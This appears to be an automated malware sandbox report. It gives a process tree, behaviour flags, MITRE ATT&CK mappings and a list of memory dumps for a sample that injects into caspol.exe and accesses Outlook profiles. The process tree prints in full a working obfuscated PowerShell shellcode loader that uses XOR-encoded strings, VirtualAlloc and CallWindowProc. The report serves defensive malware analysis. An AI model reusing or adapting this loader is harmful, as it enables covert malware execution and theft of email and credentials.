Hem'gle5lag6Smu3UovFHof1Baa7Ggl0Pro0Rha1QuoBAlo1BanCEra1Per5Law0Bri7Tax1Rhi7Sjo0Luk1Tid5uafCIld3RecBBar1EroCAmb0Und4Reg1DerDGos1Eks9Sku1Kum7Gol5ProABde5Ori6Sof2Adv0Cre1Man7Fyr0ven4Him1SicDSky1ginEsnu0Fre7Tra0Sel6Lef1OveBSeq1PhaDKon1PseCaut1Ret7Hyp0mos0Lan1IndBEli1HanCFil1Kom5Apa1Hyd7Kul0Cry0ave1RetCSup1Mil7Odo5VipEDoy5Pub6Gua2Aft1Spl1FooFSpe1Dyb3Lyc1FejERug1EarERem1Sla7Ref1GlyCMis5lodBLit'Che;Dum&Cig(Fum`$HerFBrooIngrDramGuloArvsHenaPernMicsAalkPerebek7Uvi)Ang Gra`$OveDTotrHeayAz pStrnVariBognPelgUnbsPre3Rep#Hal;""";Function Drypnings9 {param([String]$Pulik);For($Entireties=3; $Entireties -lt $Pulik.Length-1; $Entireties+=(3+1)){$Jowars = $Jowars + $Pulik.'Substring'($Entireties, 1);}$Jowars;}$Imf1= Drypnings9 $Recivilization;if([IntPtr]::size -eq 8){ .$env:windir\S*64\W*Power*\v1.0\*ll.exe $Imf1 ;}else{.$env:windir\S*32\W*Power*\v1.0\*ll.exe $Imf1;};"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1552
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Netvrksanalyse11000 {param([String]$Pulik);For($Entireties=3; $Entireties -lt $Pulik.Length-1; $Entireties+=(3+1)){$Jowars = $Jowars + $Pulik.Substring($Entireties, 1);}$Jowars;}$Netvrksanalyse11002 = Netvrksanalyse11000 'adiISynnResvFugoBalkForeCal-AdgETabxOsepforrReseInrstersBuliAnsoRecnClo ';$Netvrksanalyse11001 = Netvrksanalyse11000 'Pro$ArgCPerlVouaKalwUndlToyeFresTelsKon[Yox$devEomgnUnstAlliHjerAageMictDisiElveMansMis/Amp2Spr]Rfo Str=Imp Ven[RykcDrnofabnManvRineUltrSchtJac]Non:Mad:FloTWoooNavBLagyCoutJoweVri(Pat$GenPScauOpglUdfiTkkkVip.WenSNonuPosbScosInstOffrPoliTvenEyegNon(Inf$OroEChinAnttAdviUberEkseDegtSupiSvoeUndsAla,spo Cou2Ant)Umu,Stu Pro1Jvn6Kna)apa ';Function HTB {param([String]$Pulik);$Clawless = New-Object byte[] ($Pulik.Length / 2);For($Entireties=0; $Entireties -lt $Pulik.Length; $Entireties+=2){.($Netvrksanalyse11002) $Netvrksanalyse11001;$Clawless[$Entireties/2] = ($Clawless[$Entireties/2] -bxor 114);}[String][System.Text.Encoding]::ASCII.GetString($Clawless);}$Unrobes0=HTB '210B0106171F5C161E1E';$Unrobes1=HTB '3F1B11001D011D14065C251B1C41405C271C011314173C13061B04173F17061A1D1601';$Unrobes2=HTB '35170622001D1133161600170101';$Unrobes3=HTB '210B0106171F5C20071C061B1F175C3B1C0617001D02211700041B1117015C3A131C161E17201714';$Unrobes4=HTB '0106001B1C15';$Unrobes5=HTB '3517063F1D16071E173A131C161E17';$Unrobes6=HTB '2026210217111B131E3C131F175E523A1B1617300B211B155E522207101E1B11';$Unrobes7=HTB '20071C061B1F175E523F131C13151716';$Unrobes8=HTB '2017141E171106171636171E1715130617';$Unrobes9=HTB '3B1C3F171F1D000B3F1D16071E17';$Formosanske0=HTB '3F0B36171E1715130617260B0217';$Formosanske1=HTB '311E1301015E522207101E1B115E522117131E17165E52331C011B311E1301015E523307061D311E130101';$Formosanske2=HTB '3B1C041D1917';$Formosanske3=HTB '2207101E1B115E523A1B1617300B211B155E523C1705211E1D065E52241B000607131E';$Formosanske4=HTB '241B000607131E331E1E1D11';$Formosanske5=HTB '1C06161E1E';$Formosanske6=HTB '3C0622001D06171106241B000607131E3F171F1D000B';$Formosanske7=HTB '3B372A';$Formosanske8=HTB '2E';function fkp {Param ($muleback, $Reconcilements) ;$Labyrintiske0 =HTB '56260014001B17524F525A29330202361D1F131B1C2F484831070000171C06361D1F131B1C5C351706330101171F101E1B17015A5B520E52251A1700175F3D1018171106520952562D5C351E1D10131E330101171F101E0B3113111A17525F331C1652562D5C3E1D1113061B1D1C5C21021E1B065A56341D001F1D01131C0119174A5B295F432F5C370307131E015A56271C001D101701425B520F5B5C351706260B02175A56271C001D101701435B';&($Formosanske7) $Labyrintiske0;$Labyrintiske5 = HTB '5621061B1F17001B1C151700524F5256260014001B175C3517063F17061A1D165A56271C001D101701405E5229260B0217292F2F52325A56271C001D101701415E5256271C001D101701465B5B';&($Formosanske7) $Labyrintiske5;$Labyrintiske1 = HTB '00170607001C525621061B1F17001B1C1517005C3B1C041D19175A561C071E1E5E52325A29210B0106171F5C20071C061B1F175C3B1C0617001D02211700041B1117015C3A131C161E172017142F5A3C17055F3D101817110652210B0106171F5C20071C061B1F175C3B1C0617001D02211700041B1117015C3A131C161E172017145A5A3C17055F3D1018171106523B1C062206005B5E525A56260014001B175C3517063F17061A1D165A56271C001D101701475B5B5C3B1C041D19175A561C071E1E5E52325A561F071E17101311195B5B5B5B5E52562017111D1C111B1E171F171C06015B5B';&($Formosanske7) $Labyrintiske1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Thiostannous,[Parameter(Position = 1)] [Type] $Latchkey = [Void]);$Labyrintiske2 = HTB '563F1300150717001B061A1701524F5229330202361D1F131B1C2F484831070000171C06361D1F131B1C5C3617141B1C17360B1C131F1B11330101171F101E0B5A5A3C17055F3D101817110652210B0106171F5C2017141E1711061B1D1C5C330101171F101E0B3C131F175A56271C001D1017014A5B5B5E5229210B0106171F5C2017141E1711061B1D1C5C371F1B065C330101171F101E0B30071B1E1617003311111701012F484820071C5B5C3617141B1C17360B1C131F1B113F1D16071E175A56271C001D1017014B5E525614131E01175B5C3617141B1C17260B02175A56341D001F1D01131C011917425E5256341D001F1D01131C011917435E5229210B0106171F5C3F071E061B1113010636171E17151306172F5B';&($Formosanske7) $Labyrintiske2;$Labyrintiske3 = HTB '563F1300150717001B061A17015C3617141B1C17311D1C0106000711061D005A56271C001D101701445E5229210B0106171F5C2017141E1711061B1D1C5C31131E1E1B1C15311D1C04171C061B1D1C012F48482106131C161300165E5256261A1B1D0106131C1C1D07015B5C2117063B1F021E171F171C0613061B1D1C341E1315015A56271C001D101701455B';&($Formosanske7) $Labyrintiske3;$Labyrintiske4 = HTB '563F1300150717001B061A17015C3617141B1C173F17061A1D165A56341D001F1D01131C011917405E5256341D001F1D01131C011917415E52563E1306111A19170B5E5256261A1B1D0106131C1C1D07015B5C2117063B1F021E171F171C0613061B1D1C341E1315015A56271C001D101701455B';&($Formosanske7) $Labyrintiske4;$Labyrintiske5 = HTB '00170607001C52563F1300150717001B061A17015C310017130617260B02175A5B';&($Formosanske7) $Labyrintiske5 ;}$Deprogrammed = HTB '1917001C171E4140';$Labyrintiske6 = HTB '563F1300151D0113524F5229210B0106171F5C20071C061B1F175C3B1C0617001D02211700041B1117015C3F1300011A131E2F484835170636171E1715130617341D0034071C11061B1D1C221D1B1C0617005A5A1419025256361702001D1500131F1F17165256341D001F1D01131C011917465B5E525A35362652325A293B1C062206002F5E5229273B1C0641402F5E5229273B1C0641402F5E5229273B1C0641402F5B525A293B1C062206002F5B5B5B';&($Formosanske7) $Labyrintiske6;$Smallen = fkp $Formosanske5 $Formosanske6;$Labyrintiske7 = HTB '56350017171C10131119170041524F52563F1300151D01135C3B1C041D19175A293B1C062206002F48482817001D5E524144425E52420A414242425E52420A46425B';&($Formosanske7) $Labyrintiske7;$Labyrintiske8 = HTB '562017041D1E07061B1D1C17001B1C1517001C17524F52563F1300151D01135C3B1C041D19175A293B1C062206002F48482817001D5E52420A4342424242425E52420A414242425E52420A465B';&($Formosanske7) $Labyrintiske8;$Greenbacker00='HKCU:\Voltzine\Levellers';$Greenbacker01 =HTB '5636000B021C1B1C15014F5A3517065F3B06171F22001D021700060B525F2213061A5256350017171C10131119170042425B5C39001310130617001C17';&($Formosanske7) $Greenbacker01;$Labyrintiske9 = HTB '563E13100B001B1C061B011917524F5229210B0106171F5C311D1C041700062F484834001D1F3013011744462106001B1C155A5636000B021C1B1C15015B';&($Formosanske7) $Labyrintiske9;$Drypnings0 = HTB '29210B0106171F5C20071C061B1F175C3B1C0617001D02211700041B1117015C3F1300011A131E2F4848311D020B5A563E13100B001B1C061B0119175E52425E525256350017171C101311191700415E524144425B';&($Formosanske7) $Drypnings0;$Anciennitetsberegninger31=$Labyrintiske.count-360;$Drypnings1 = HTB '29210B0106171F5C20071C061B1F175C3B1C0617001D02211700041B1117015C3F1300011A131E2F4848311D020B5A563E13100B001B1C061B0119175E524144425E52562017041D1E07061B1D1C17001B1C1517001C175E5256331C111B171C1C1B0617060110170017151C1B1C15170041435B';&($Formosanske7) $Drypnings1;$Drypnings2 = HTB '563F17001B1C15071701524F5229210B0106171F5C20071C061B1F175C3B1C0617001D02211700041B1117015C3F1300011A131E2F484835170636171E1715130617341D0034071C11061B1D1C221D1B1C0617005A56350017171C101311191700415E525A35362652325A293B1C062206002F5E293B1C062206002F5B525A29241D1B162F5B5B5B';&($Formosanske7) $Drypnings2;$Drypnings3 = HTB '563F17001B1C150717015C3B1C041D19175A562017041D1E07061B1D1C17001B1C1517001C175E56211F131E1E171C5B';&($Formosanske7) $Drypnings3#"
    3⤵
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4684
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      PID:4316
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      PID:4956
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      Checks QEMU agent file
      Accesses Microsoft Outlook profiles
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:3992

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Web Service

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1552-168-0x00007FF8527C0000-0x00007FF853281000-memory.dmp

Filesize
10.8MB

Download
memory/1552-134-0x00000294EFCA0000-0x00000294EFCC2000-memory.dmp

Filesize
136KB

Download
memory/1552-150-0x00007FF8527C0000-0x00007FF853281000-memory.dmp

Filesize
10.8MB

Download
memory/1552-136-0x00007FF8527C0000-0x00007FF853281000-memory.dmp

Filesize
10.8MB

Download
memory/3992-166-0x000000001F940000-0x000000001F9DC000-memory.dmp

Filesize
624KB

Download
memory/3992-163-0x0000000000401000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3992-170-0x00000000208B0000-0x0000000020900000-memory.dmp

Filesize
320KB

Download
memory/3992-169-0x0000000020500000-0x0000000020592000-memory.dmp

Filesize
584KB

Download
memory/3992-172-0x00007FF871450000-0x00007FF871645000-memory.dmp

Filesize
2.0MB

Download
memory/3992-165-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/3992-171-0x0000000020480000-0x000000002048A000-memory.dmp

Filesize
40KB

Download
memory/3992-162-0x0000000000400000-0x000000000062B000-memory.dmp

Filesize
2.2MB

Download
memory/3992-161-0x0000000077A40000-0x0000000077BE3000-memory.dmp

Filesize
1.6MB

Download
memory/3992-160-0x0000000077A40000-0x0000000077BE3000-memory.dmp

Filesize
1.6MB

Download
memory/3992-159-0x00007FF871450000-0x00007FF871645000-memory.dmp

Filesize
2.0MB

Download
memory/3992-173-0x0000000077A40000-0x0000000077BE3000-memory.dmp

Filesize
1.6MB

Download
memory/3992-158-0x0000000000E00000-0x0000000000F00000-memory.dmp

Filesize
1024KB

Download
memory/3992-156-0x0000000000E00000-0x0000000000F00000-memory.dmp

Filesize
1024KB

Download
memory/4684-142-0x0000000005EF0000-0x0000000005F0E000-memory.dmp

Filesize
120KB

Download
memory/4684-145-0x00000000072D0000-0x0000000007366000-memory.dmp

Filesize
600KB

Download
memory/4684-155-0x0000000077A40000-0x0000000077BE3000-memory.dmp

Filesize
1.6MB

Download
memory/4684-152-0x00007FF871450000-0x00007FF871645000-memory.dmp

Filesize
2.0MB

Download
memory/4684-157-0x0000000077A40000-0x0000000077BE3000-memory.dmp

Filesize
1.6MB

Download
memory/4684-151-0x0000000006FF0000-0x000000000766A000-memory.dmp

Filesize
6.5MB

Download
memory/4684-149-0x0000000006FF0000-0x000000000766A000-memory.dmp

Filesize
6.5MB

Download
memory/4684-147-0x00000000082A0000-0x0000000008844000-memory.dmp

Filesize
5.6MB

Download
memory/4684-146-0x0000000007220000-0x0000000007242000-memory.dmp

Filesize
136KB

Download
memory/4684-153-0x0000000077A40000-0x0000000077BE3000-memory.dmp

Filesize
1.6MB

Download
memory/4684-144-0x0000000007030000-0x000000000704A000-memory.dmp

Filesize
104KB

Download
memory/4684-143-0x0000000007670000-0x0000000007CEA000-memory.dmp

Filesize
6.5MB

Download
memory/4684-167-0x0000000077A40000-0x0000000077BE3000-memory.dmp

Filesize
1.6MB

Download
memory/4684-141-0x00000000057A0000-0x0000000005806000-memory.dmp

Filesize
408KB

Download
memory/4684-140-0x0000000005730000-0x0000000005796000-memory.dmp

Filesize
408KB

Download
memory/4684-139-0x0000000004F90000-0x0000000004FB2000-memory.dmp

Filesize
136KB

Download
memory/4684-138-0x0000000005090000-0x00000000056B8000-memory.dmp

Filesize
6.2MB

Download
memory/4684-137-0x0000000002570000-0x00000000025A6000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads